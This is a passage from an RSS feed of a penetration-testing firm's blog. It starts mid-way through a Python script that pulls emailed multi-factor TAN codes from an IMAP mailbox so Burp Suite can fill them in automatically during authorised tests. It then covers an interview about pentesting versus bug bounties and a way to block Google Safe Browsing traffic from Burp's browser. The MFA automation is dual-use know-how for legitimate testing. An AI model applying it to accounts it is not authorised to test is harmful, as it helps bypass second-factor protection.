&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-20" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-20" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-20"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;#print(line)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-21" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-21" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-21"&gt;&lt;/a&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;startswith&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"Your TAN is: "&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-22" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-22" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-22"&gt;&lt;/a&gt;            &lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"Your TAN is: "&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-23" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-23" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-23"&gt;&lt;/a&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-24" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-24" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-24"&gt;&lt;/a&gt;        &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-25" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-25" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-25"&gt;&lt;/a&gt;        &lt;span class="k"&gt;break&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-26" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-26" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-26"&gt;&lt;/a&gt;    &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-27" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-27" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-27"&gt;&lt;/a&gt;        &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"No token found"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-28" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-28" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-28"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#print('Message %s\n%s\n' % (num, data[0][1]))&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-29" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-29" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-29"&gt;&lt;/a&gt;&lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"Final token:"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-30" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-30" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-30"&gt;&lt;/a&gt;&lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-31" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-31" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-31"&gt;&lt;/a&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-32" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-32" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-32"&gt;&lt;/a&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;logout&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The Python code will login to the IMAP mailbox, retrieve E-mails starting with the newest,
quick'n'dirty parse the TAN from the E-mail by interating through each line of the E-mail
and assign the the first token found to the &lt;code class="docutils literal"&gt;output&lt;/code&gt; variable that Hackvertor expects.
You might need to play with the sleep delay we introduced at the beginning of the script
to make sure the E-mail reaches the mailbox before you try to retrieve it. Otherwise you
could change the script to only consider the very newest E-mail but you would need to take
care to delete old E-mails. And of course you need to change your E-mail server, username
and password. Please be aware that this is as well not thread-safe, you would need a
seperate E-mail mailbox for each thread to make it concurrent.&lt;/p&gt;
&lt;p&gt;Configuring a search and replace rule in the Burp Proxy to replace any second factor you enter
with the Hackvertor tab is left as an exercise to the reader. We were able to test websites
without ever entering the second factor manually again, as the entered token was replaced
with a Hackvertor tag and Hackvertor fetched the token from the mailbox.&lt;/p&gt;
&lt;p&gt;Hackvertor is therefore the perfect solution if you would like to script things that are
sent in HTTP requests. With the new scripting capabilities, it is not necessary to write
extensions when you want to change things sent out. Or do you? Unfortunately, there are
certain limitations with this approach and in Burp. The search and replace rule for the
Proxy of course only works for the Burp Proxy. But what if we want to make the Burp Crawler
be able to login with second-factor TANs? We can't use session handling rules (another
advanced topic of Burp), as they don't apply for Burp Crawler. But we were able to write
an extension that handles that part, but that's for another blog post (it is really cool
to see the headed browser of Burp login correctly). And what if you would also like to
modify HTTP responses? Or what if you would like to even enhance Burp with a Transfer-Encoding
feature it does not yet support? Do you want to know how you could set up an SMS to E-mail
gateway? Stay tuned for our next blog posts, subscribe to our &lt;a class="reference external" href="https://www.pentagrid.ch/en/rss.xml"&gt;RSS feed&lt;/a&gt;
or follow us on &lt;a class="reference external" href="https://twitter.com/pentagridsec"&gt;Twitter&lt;/a&gt; or
&lt;a class="reference external" href="https://www.linkedin.com/company/67698060/"&gt;LinkedIn&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Update 2025-06-04: An update of Hackvertor in 2025 changed the style of closing elements from &lt;cite&gt;&amp;lt;@/name&amp;gt;&lt;/cite&gt; to &lt;cite&gt;&amp;lt;/@name&amp;gt;&lt;/cite&gt;. Therefore, we updated the post, but not the screenshots.&lt;/p&gt;
&lt;aside class="footnote-list brackets"&gt;
&lt;aside class="footnote brackets" id="ahv" role="doc-footnote"&gt;
&lt;span class="label"&gt;&lt;span class="fn-bracket"&gt;[&lt;/span&gt;&lt;a role="doc-backlink" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#footnote-reference-1"&gt;1&lt;/a&gt;&lt;span class="fn-bracket"&gt;]&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;The de facto Swiss social security number, respectively German: AHV Alters- und Hinterbliebenenversicherung, Rumantsch: AVS - Sgüranza da vegls e relatschats, Italian: AVS - Assicurazione per la vecchiaia e per i superstiti, French: AVS - L'assurance-vieillesse et survivants&lt;/p&gt;
&lt;/aside&gt;
&lt;/aside&gt;
&lt;/section&gt;</description><category>Burp</category><category>Hackvertor</category><category>Multi-Factor Authentication</category><category>OWASP</category><category>Pentesting</category><category>Portswigger</category><category>Python</category><guid>https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/</guid><pubDate>Wed, 17 Mar 2021 08:00:00 GMT</pubDate></item><item><title>Interview on the “SCS in a nutshell” channel about penetration testing versus bug bounty programs</title><link>https://www.pentagrid.ch/en/blog/interview-about-penetration-testing-vs-bug-bounty-programs/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;Swiss Cyber Storm and their host Christian Folini invited freelancing Bug Bounty
hunter Raphaël Arrouas and Pentagrid’s IT security analyst Tobias Ospelt to an
interview in the „SCS in a nutshell” format about the pro and cons of
penetration testing and bug bounty programs. While both approaches are valid
methods to find security vulnerabilities, they also differ in many aspects.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;The interview began with a discussion about the trust in the maturity level of
the Bug Bounty program owner’s security and the necessary trust in people
knowing about an organisation’s vulnerabilities. The interview continues with
the flexibility on defining rules and scopes, the freedom of picking a scope
and about private bug bounty programs, a new format with increasing prominence.
The pros and cons of the different economic twists, where a company rewards
only identified vulnerabilities versus paying for work time are discussed as
well as the visibility and significance of pentest and bug bounty results and
their internal processing within a company.&lt;/p&gt;
&lt;p&gt;In the conversation, the security researchers’ risk to violate the hacker
paragraphs StGB 143 and 144 in Swiss law is also highlighted, because the law disregards
researchers and bug bounty hunters acting in good faith.&lt;/p&gt;
&lt;p&gt;The whole interview discussing additional topics runs for about 45 minutes and
is available via the &lt;a class="reference external" href="https://youtu.be/pTCljaQVlTU"&gt;Swiss Cyber Storm Youtube channel&lt;/a&gt;.&lt;/p&gt;</description><category>Bug Bounty</category><category>Pentesting</category><category>Swiss Cyber Storm</category><guid>https://www.pentagrid.ch/en/blog/interview-about-penetration-testing-vs-bug-bounty-programs/</guid><pubDate>Tue, 02 Mar 2021 06:00:00 GMT</pubDate></item><item><title>Block browser requests to Google during security analysis in Burp</title><link>https://www.pentagrid.ch/en/blog/block_browser_requests_to_google_during_security_analysis_in_burp/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;How to stop Portswigger's Burp Proxy's built-in Chromium browser to leak information to Google's Safe Browsing during a web application penetration test?&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;When doing web application security research and penetration tests for customers, we sometimes get insights into tools we use that seem weird and undesired. A while ago we were testing a financial website with confidential data with the Mozilla Firefox browser and Firefox was sending the following requests whenever we downloaded a PDF from the website:&lt;/p&gt;
&lt;pre class="literal-block"&gt;POST /safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY% HTTP/1.1
Host: sb-ssl.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 189
Connection: close

blob:https://www.example.org/6f75423b-3828-5e4b-8241-3e633c684041___________
Dblob:https://www.example.org/6f75423b-3828-5e4b-8241-3e633c684041___
txt_download_name_file_overview.pdf
[...]&lt;/pre&gt;
&lt;p&gt;As you can see, Firefox leaks the PDF file name we were downloading, the hostname of the website we were testing and some more binary data that could include a file hash. On one side we were happy that we found this privacy issue and could report it to our customer, because this browser behaviour affects normal users. On the other side we do not want our testing tools to behave like this. Safebrowsing can be disabled via the pentest browser's settings menu or by setting these values in &lt;code class="docutils literal"&gt;about:config&lt;/code&gt; and it must be done for every web application test browser in use:&lt;/p&gt;
&lt;pre class="literal-block"&gt;browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false&lt;/pre&gt;
&lt;p&gt;In the meantime the &lt;a class="reference external" href="https://portswigger.net/burp"&gt;Portswigger Burp proxy&lt;/a&gt; we use regularly and write extensions for was updated to include &lt;a class="reference external" href="https://portswigger.net/burp/releases/professional-community-2020-7"&gt;a new feature: A builtin Chromium browser&lt;/a&gt;. We really appreciate the added usability and were happy to use this feature in a security analysis in a corporate Windows AD environment, where changing proxy settings was not allowed for the preinstalled browser. Fortunately because we asked our customer to install Burp with administrative privileges, the built-in Chromium browser of Burp could be used. However, we noticed that the preconfigured Chromium browser was again very verbose and contacted Google servers, especially during startup. As we would like to keep all information about our security analysis to our customers and ourselves, we avoid any third-party services wherever feasible. That's why we operate and use our own Burp Collaborator server, for example.&lt;/p&gt;
&lt;p&gt;It is possible to disable the Safe Browsing feature in the browser used to perform web application pentests. However, if it is necessary to switch the browser, these settings must be changed there as well and the approach does not really work for the the built-in Chromium browser, because its settings are reset on every start. The easiest solution is to control traffic in the Burp Proxy: We can abuse the Upstream-Proxy setting found in "User options - Connections" in Burp for this purpose. While the following approach will block the requests from reaching the Google servers, they will still show up in the history tab of Burp.&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;p&gt;Download &lt;a class="reference external" href="https://www.pentagrid.ch/files/code/google-blocking.json"&gt;google-blocking.json&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;In Burp, go to "User options - Connection".&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;On the left of the "Upstream Proxy Servers" headline, click the settings and chose "Load options".&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Chose the file you just downloaded and press "OK". Then, the upstream proxy settings look like in the screenshot below.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;img alt="/images/202011_Burp_Settings_Google_Blocking.png" src="https://www.pentagrid.ch/images/202011_Burp_Settings_Google_Blocking.png"&gt;
&lt;p&gt;This configuration will redirect requests to most Google domains to TCP port 1337 on localhost, which is (hopefully) a dead end. It is possible to use the file as a Burp startup configuration, or even better, merge it with your existing startup configuration by editing the Burp settings JSON file manually. Then, your are able to use these Burp settings in new projects as well.&lt;/p&gt;
&lt;p&gt;A drawback of the approach is that your test browser cannot be used for Google searches afterwards and it may break functionality if the tested sites requires resources from Google of course. However, it is recommended to use separate browsers for regular work and for web application testing anyway, because they are configured for different purposes.&lt;/p&gt;</description><category>Burp</category><category>Chromium</category><category>Firefox</category><category>Google</category><category>Information Disclosure</category><category>OWASP</category><category>Pentesting</category><category>Portswigger</category><guid>https://www.pentagrid.ch/en/blog/block_browser_requests_to_google_during_security_analysis_in_burp/</guid><pubDate>Wed, 04 Nov 2020 09:00:00 GMT</pubDate></item></channel></rss>